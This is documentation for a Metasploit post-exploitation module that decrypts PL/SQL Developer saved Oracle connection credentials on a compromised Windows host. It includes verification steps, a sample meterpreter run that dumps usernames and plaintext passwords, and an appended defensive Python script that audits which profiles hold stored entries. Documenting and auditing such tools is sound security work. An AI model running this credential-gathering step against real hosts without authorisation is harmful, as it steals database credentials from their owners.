## Vulnerable Application

This module can decrypt the histories and connection credentials stored by PL/SQL Developer. Passwords are available only if the user chose to have them remembered.

An analysis of the encryption algorithm is available [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/).
You can find its official website [here](https://www.allroundautomations.com/products/pl-sql-developer/).

## Verification Steps

1. Download and install PL/SQL Developer.
2. (Optional) Change the PL/SQL Developer preference to save the passwords.
3. Use PL/SQL Developer to log in to an Oracle database, or add a connection in PL/SQL Developer manually.
4. Get a `meterpreter` session on a Windows host.
5. Do: `run post/windows/gather/credentials/plsql_developer`
6. The username, password, and SID of each connection will be printed.

## Options

**PLSQL_PATH**
- Specify the path of PL/SQL Developer

## Scenarios

```
meterpreter > run windows/gather/credentials/plsql_developer
[*] Gather PL/SQL Developer Histories and Connections on WIN-XXXXXXXXXXX
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs

PL/SQL Developer Histories and Credentials
==========================================

DisplayName                              Username  Database  ConnectAs  Password   FilePath
-----------                              --------  --------  ---------  --------   --------
[Connections]/Imported Fixed Users/Test  sys       ORCL      SYSDBA     pass       C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs
[Connections]/Imported History/Test      sys       ORCL      SYSDBA     oracle     C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
[LogonHistory]                           test2     ORCL      Normal     password2  C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
[LogonHistory]                           test1     ORCL      Normal                C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
[LogonHistory]                           sys       ORCL      SYSDBA     oracle     C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
[LogonHistory]                           user      server    Normal     password   C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs

[+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231109050433_default_127.0.0.1_host.plsql_devel_357810.txt
meterpreter >
```
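A defender-side check for the same files, as an added example that is not part of the module or its documentation: it walks the `user.prefs` locations shown in the output above and reports which profiles still hold saved logon history or connection entries, without decoding them. The function names, the INI-style section layout and the sample tree are assumptions made for this example.

```python
import glob
import os
import tempfile

# Section names as shown in the module output's DisplayName column. Assumption:
# they are INI-style headers in user.prefs with one stored value per line.
SECTIONS = ("[LogonHistory]", "[Connections]")

def count_stored_lines(prefs_text):
    """Count non-empty lines under each credential-bearing section."""
    counts = dict.fromkeys(SECTIONS, 0)
    current = None
    for raw in prefs_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line if line in counts else None
        elif line and current:
            counts[current] += 1
    return counts

def audit_profiles(users_root):
    """Return {path: counts} for each user.prefs that still holds entries."""
    pattern = os.path.join(users_root, "*", "AppData", "Roaming",
                           "PLSQL Developer*", "Preferences", "*", "user.prefs")
    findings = {}
    for path in sorted(glob.glob(pattern)):
        with open(path, encoding="utf-8", errors="replace") as fh:
            counts = count_stored_lines(fh.read())
        if any(counts.values()):
            findings[path] = counts
    return findings

def build_sample_tree(root):
    """Constructed sample data: two profiles, only one with stored entries."""
    samples = {
        "PLSQL Developer 15": "[LogonHistory]\n0000\n\n[Connections]\n1111\n2222\n[Other]\nx=1\n",
        "PLSQL Developer": "[LogonHistory]\n\n[Other]\nx=1\n",
    }
    for app_dir, text in samples.items():
        prefs = os.path.join(root, "alice", "AppData", "Roaming", app_dir,
                             "Preferences", "alice")
        os.makedirs(prefs)
        with open(os.path.join(prefs, "user.prefs"), "w", encoding="utf-8") as fh:
            fh.write(text)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        print(audit_profiles(root))
```

On a Windows host, `audit_profiles(r"C:\Users")` covers every local profile; the counts are stored lines per section, not a number of connections.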